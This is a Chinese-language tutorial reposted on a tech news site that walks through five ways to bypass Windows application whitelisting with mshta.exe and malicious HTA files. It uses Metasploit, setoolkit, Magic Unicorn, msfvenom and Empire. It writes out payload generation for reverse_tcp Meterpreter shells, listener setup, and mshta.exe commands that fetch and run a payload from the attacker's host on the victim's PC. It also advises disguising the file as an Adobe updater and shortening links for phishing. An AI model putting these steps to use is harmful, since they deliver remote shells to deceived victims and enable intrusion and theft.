加入收藏 | 设为首页 | 会员中心 | 我要投稿 拼字网 - 核心网 (https://www.hexinwang.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 综合聚焦 > 移动互联 > 应用 > 正文

使用mshta.exe绕过应用程序白名单(多种方法)

发布时间:2022-10-18 23:00:41 所属栏目:应用 来源:未知
导读: 大家好,又见面了,我是你们的朋友全栈君。
0x00 简介
很长一段时间以来,HTA文件一直被web攻击或在野恶意软件下载程序用作恶意程序的一部分。HTA文件在网络安全领域内广为人知,从红队和蓝

大家好,又见面了,我是你们的朋友全栈君。

0x00 简介

很长一段时间以来,HTA文件一直被web攻击或在野恶意软件下载程序用作恶意程序的一部分。HTA文件在网络安全领域内广为人知,从红队和蓝队的角度来看,它是绕过应用程序白名单有价值的“古老”方式之一。运行Microsoft HTML应用程序主机的Mshta.exe,Windows OS实用程序负责运行HTA(HTML应用程序)文件。我们可以运行JavaScript或Visual的HTML文件。您可以使用Microsoft MSHTA.exe工具解析这些文件。

0x01 HTA重要性

最后,利用htaccess文件或基于浏览器的分类的其他策略转移将有助于提高利用率。利用HTA文件进行基于web的攻击。HTA文件中有大量的灵活性; 你将有效地使它看起来像一个Adobe更新程序。此外,通过HTTPS使HTA文件限制不使用少许SSL拦截/阻断的发现率也是有用的。HTA记录有助于绕过防病毒,因为它们仍没有被很好地识别到。最后但并非不重要的HTA也可以用于网络钓鱼,取代旧的Java applet。

0x02 攻击方法

HTA攻击有多种方法,如下所示:

1.第一种方法:Metasploit

我们的第一种方法是在Metasploit中使用inbuild exploit。为此,请进入到kali中的终端并输入命令:msfconsole

metasploit包含“hta web server”模块,该模块生成恶意hta文件。此模块承载一个HTML应用程序(HTA),打开时将通过PowerShell运行有效负载。当用户打开HTA文件时,IE会在执行exploit之前提示用户两次。当Metasploit启动时,输入以下命令:

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit

复制

一旦exploit被执行,它将为您提供扩展名为.hta的URL链接。同时,Metasploit将启动允许您共享文件的服务器。此链接您还必须在受害者的PC上运行。使用以下命令:

mshta.exe http://192.168.1.109:8080/pKz4Kk059Nq9.hta

复制

HTA的通常文件扩展名是.hta。我们使用了上面的命令,因为HTA被视为扩展名为.exe的任何可执行文件,因此通过mshta.exe执行。当hta由mshta.exe启动时,它使用签名的Microsoft二进制文件,允许您调用PowerShell并将payload直接注入内存中。

执行上述命令后,您将打开一个会话。要访问会话,请输入以下命令:

sessions 1

复制

因此应用白名单,您将拥有一个meterpreter会话

2.第二种方法:Setoolkit

我们的HTA攻击方法是通过setoolkit来执行。为此,在您的kali中打开setoolkit。从菜单中选择第一个选项,输入1并选择第一个选项以选择Social-Engineering Attacks。

从下一个给定菜单中,通过输入2并选择第二个选项以选择website attack vendors

从下一个给定菜单中输入选项8以选择HTA attack method

一旦您为HTA攻击选择了选项8,接下来您需要选择选项2,它将允许您克隆一个站点。一旦选择了选项2,它将询问您要克隆的站点的URL。如我们在此提供的所需的URL:

在给出URL之后,它将要求您选择所需的meterpreter类型。通过输入3以选择第三个meterprter reverse tcp.

键入3后按Enter键,进程将启动,您将拥有handler(multi/handler)

现在把你的恶意IP转换成短链接,当你向受害者分享此链接时,这将显示给受害者更真实的攻击

当受害者浏览上述恶意链接时,文件保存后会自动保存在受害者电脑中执行,如下图所示:

然后您将拥有一个meterpreter会话。您可以使用命令’sysinfo’获取受害者电脑的基本信息

3.第三种方法:Magic Unicorn

HTA攻击的下一个方法是使用unicorn的第三方工具。magic unicorn工具由Dave Kennedy开发。它是一款用户友好性的工具,它允许我们通过将shellcode直接注入内存来执行HTA攻击。该工具的最佳部分是它与Metasploit兼容,以及shellcode和cobalt strik。您可以在trustedsec.com上详细查看该软件,也可以从GitHub下载该软件,或者使用以下链接下载:

一旦你下载了magic unicorn。在kali的终端打开并输入:

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.109 1234 hta

复制

执行上述命令将启动创建.hta文件的过程。上诉.hta文件将在文件夹hta-attack/中被创建。进入该文件夹,通过键入以下命令查看创建的文件列表:

cd hta_attack/
ls

复制

现在您可以看到.hta文件,即launcher.hta。启动python服务器以便共享此文件。为此,请输入以下命令:

python -m SimpleHTTPServer 80

复制

服务器启动并运行后,在受害者PC的cmd提示符中执行以下命令:

mshta.exe http://192.168.1.109/Launcher.hta

复制

当执行上述命令时,您将在multi/handler中激活会话。要访问会话,请键输入以下命令:

sessions 1

复制

4.第四种方法:MSFVenom

HTA攻击的下一种方法是通过msfvenom手动创建.hta文件。创建.hta文件,在kali终端中键输入以下命令:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f hta-psh > shell.hta

复制

执行上述命令将创建一个.hta文件,您可以利用该文件。创建文件后,打开python服务器,通过输入以下内容将文件共享到受害者的PC:

python -m SimpleHTTPServer 80

复制

输入以下命令运行上述文件:

mshta.exe http:192.168.1.109/shell.hta

复制

同时,在受害者的命令提示符中运行上述文件时,启动handler以接收会话。要启动multi/handler,请输入以下命令:

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

复制

因此,通过使用这种简单的方法,您将获得您的meterpreter会话。您可以使用sysinfo查看受害者PC的基本信息。

5.第五种方法:PowerShell Empire

对于我们的下一个msbuild攻击方法,我们将使用empire。empire是一款后开发框架。到目前为止,我们已经将我们的XML工具与Metasploit匹配,但在这种方法中,我们将使用empire框架。它只是基于python的PowerShell windows代理,这使得它非常有用。Empire由@harmj0y、@sixdub、@enigam0x3、rvrsh3ll、@killswitch_gui和@xorrier开发。您可以从下载此框架。

(编辑:拼字网 - 核心网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!